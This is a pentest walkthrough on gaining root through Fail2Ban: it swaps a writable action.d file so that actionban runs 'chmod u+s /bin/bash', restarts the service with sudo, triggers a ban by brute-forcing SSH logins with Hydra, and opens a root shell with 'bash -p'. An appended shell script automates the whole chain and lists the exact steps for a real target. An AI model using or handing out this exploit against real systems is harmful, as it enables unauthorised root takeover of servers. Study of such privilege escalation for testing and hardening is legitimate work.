### What is Fail2Ban?

Fail2ban is an intrusion prevention software framework. It watches log files for repeated failed authentication attempts and bans the offending source address for a while, usually by inserting a firewall rule. That reduces the rate of incorrect authentication attempts, but it cannot eliminate the risk that weak authentication presents. Configure services to use only two-factor or public/private key authentication if you really want to protect them.

With that in mind, assume the following pentest scenario: you have a shell on a server that runs Fail2Ban, and the user you landed as is allowed to run `/etc/init.d/fail2ban restart` as root. How do we use that to gain root on the server? :)

### Knowing your privileges

First, run `sudo -l`. Depending on the configuration of `/etc/sudoers` it may or may not prompt for the user's password.

![](https://i.imgur.com/fGiX7Yy.png)

If the output looks like this, with or without the `NOPASSWD` tag, we have a great chance of getting root. Next, check which groups the user belongs to:

![](https://i.imgur.com/T8jHjYH.png)

The user is also a member of the `security` group. Keep that in mind: group membership is what usually grants write access to directories under `/etc/` that are otherwise root-only.
Next we look for writable paths inside `/etc/`, hoping to find `/etc/fail2ban/action.d`:

```bash=
find /etc -writable -ls 2>/dev/null
```

![](https://i.imgur.com/YVs5q4R.png)

The directory `/etc/fail2ban/action.d` is writable. It contains `iptables-multiport.conf`, which defines the commands Fail2Ban runs when a jail starts, stops, bans or unbans an address. Those commands are executed by `fail2ban-server`, which runs as root, so controlling this file means controlling a command that root will run for us.

### Privilege Escalation

The file itself is owned by root, but the directory is writable, so we can replace it: move `iptables-multiport.conf` to `iptables-multiport.conf.bak` (renaming only needs write permission on the directory) and copy the backup back under the original name. The copy is a new file, owned by us. Now edit it, comment out the existing `actionban` rule and add a new `actionban` with the command you want root to execute, a reverse shell or anything else:

```bash=
<-SNIP->
actionban = chmod u+s /bin/bash
#actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>
<-SNIP->
```

![](https://i.imgur.com/1pCEmcu.png)

Save the file and restart the service with the sudo rule we found, so `fail2ban-server` reloads the modified action:

![](https://i.imgur.com/DgjBHMB.png)

Read `/etc/fail2ban/jail.conf` (and `jail.local`, which overrides it) to see how many failed logins within `findtime` trigger the ban; by default `maxretry` is `5`. The easiest way to get the ban action called is to fail that many SSH logins from your attacking machine, for example with Hydra brute-forcing the root password:

![](https://i.imgur.com/GMgGQw6.png)

Change the Hydra command to something like:

```bash=
hydra -l root -P ~/path/to/wordlist.txt x.x.x.x ssh
```

The passwords don't need to be right; only the number of failures matters. The ban targets your own source address, but since `actionban` now only runs our command, no firewall rule is actually added. After a few tries, check whether `/bin/bash` is now setuid:

![](https://i.imgur.com/EQSfGXL.png)

VOILA! Now the fun part! Just run `bash -p` for a root shell (`-p` tells bash not to drop the effective UID):

![](https://i.imgur.com/3KhYrHy.png)
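The whole chain above as an added example (this script is not part of the original writeup): the enumeration, the `maxretry` check, the `action.d` swap, the trigger and the final check wrapped in shell functions that take the Fail2Ban directory as a parameter, so the file edits can be rehearsed on a scratch copy before touching `/etc/fail2ban`. The function names, the scratch tree and the sample config contents are constructed for the example; the default payload is the writeup's `chmod u+s /bin/bash`. The stand-alone run works on a temporary copy and changes nothing under `/etc`.

```shell
#!/usr/bin/env bash
# Added example, not code from the writeup: the chain above as functions
# parameterised on the fail2ban directory, so the file edits can be
# rehearsed on a scratch copy before touching /etc/fail2ban.
set -eu

# 1. Enumeration: paths under the fail2ban tree the current user can write.
find_writable_f2b() {
    find "${1:-/etc/fail2ban}" -writable 2>/dev/null | sort
}

# 2. Check: failures needed before the ban fires for one jail (default sshd).
#    jail.local overrides jail.conf, a per-jail maxretry overrides [DEFAULT],
#    and fail2ban's built-in default is 5.
maxretry_of() {
    cfgdir=$1; jail=${2:-sshd}
    set --
    for f in "$cfgdir/jail.conf" "$cfgdir/jail.local"; do
        if [ -f "$f" ]; then set -- "$@" "$f"; fi
    done
    if [ $# -eq 0 ]; then echo 5; return; fi
    awk -v jail="$jail" '
        /^[[:space:]]*\[/ { sec = $0; gsub(/[^A-Za-z0-9_-]/, "", sec); next }
        /^[[:space:]]*maxretry[[:space:]]*=/ {
            v = $0; sub(/^[^=]*=/, "", v); sub(/[;#].*/, "", v); gsub(/[[:space:]]/, "", v)
            if (sec == "DEFAULT") d = v; else if (sec == jail) j = v
        }
        END { print (j != "" ? j : (d != "" ? d : 5)) }' "$@"
}

# 3. Hijack: the file is root-owned but its directory is writable, so rename
#    the original (needs only directory write) and write a new file under the
#    same name, which we own. fail2ban-server (root) runs actionban through
#    /bin/sh, so the payload is an arbitrary root command. Indented lines
#    after the old actionban are continuation lines and get commented too.
hijack_actionban() {
    action=$1; payload=${2:-chmod u+s /bin/bash}
    mv "$action" "$action.bak"
    awk -v p="$payload" '
        /^actionban[[:space:]]*=/ { print "actionban = " p; print "#" $0; cont = 1; next }
        cont && /^[[:space:]]/   { print "#" $0; next }
        { cont = 0; print }' "$action.bak" > "$action"
}

# 4. Trigger, run from the attacking host: more than maxretry failed logins
#    inside findtime and the sshd jail bans the source, running actionban as
#    root. The wordlist content is irrelevant; only the failure count matters.
trigger_ban() {
    target=$1; tries=$2; wl=$(mktemp)
    seq "$tries" | sed 's/^/not-the-password-/' > "$wl"
    hydra -l root -P "$wl" -t 1 "ssh://$target"
    rm -f "$wl"
}

# 5. Verify on the target; with the default payload bash is now setuid root.
is_setuid() { [ -u "$1" ]; }

# Constructed scratch tree (not a real install) to rehearse steps 2 and 3.
make_scratch_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/action.d"
    cat > "$d/jail.conf" <<'EOF'
[DEFAULT]
bantime  = 10m
findtime = 10m
maxretry = 5
[sshd]
enabled = true
EOF
    printf '[sshd]\nmaxretry = 3\n' > "$d/jail.local"
    cat > "$d/action.d/iptables-multiport.conf" <<'EOF'
[Definition]
actionstart = <iptables> -N f2b-<name>
actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>
actionunban = <iptables> -D f2b-<name> -s <ip> -j <blocktype>
EOF
    echo "$d"
}

# Stand-alone rehearsal on the scratch tree; nothing under /etc is touched.
scratch=$(make_scratch_tree)
echo "sshd jail bans after $(maxretry_of "$scratch") failures"
hijack_actionban "$scratch/action.d/iptables-multiport.conf"
cat "$scratch/action.d/iptables-multiport.conf"
rm -rf "$scratch"
```

On a real target the sequence is `find_writable_f2b`, `hijack_actionban /etc/fail2ban/action.d/iptables-multiport.conf`, `sudo /etc/init.d/fail2ban restart`, then from the attacking host `trigger_ban <target> $(( $(maxretry_of /etc/fail2ban) + 1 ))`, and back on the target `is_setuid /bin/bash && bash -p`. The failures must land inside `findtime` or the counter resets, and the `.bak` file is what you restore from once you are done.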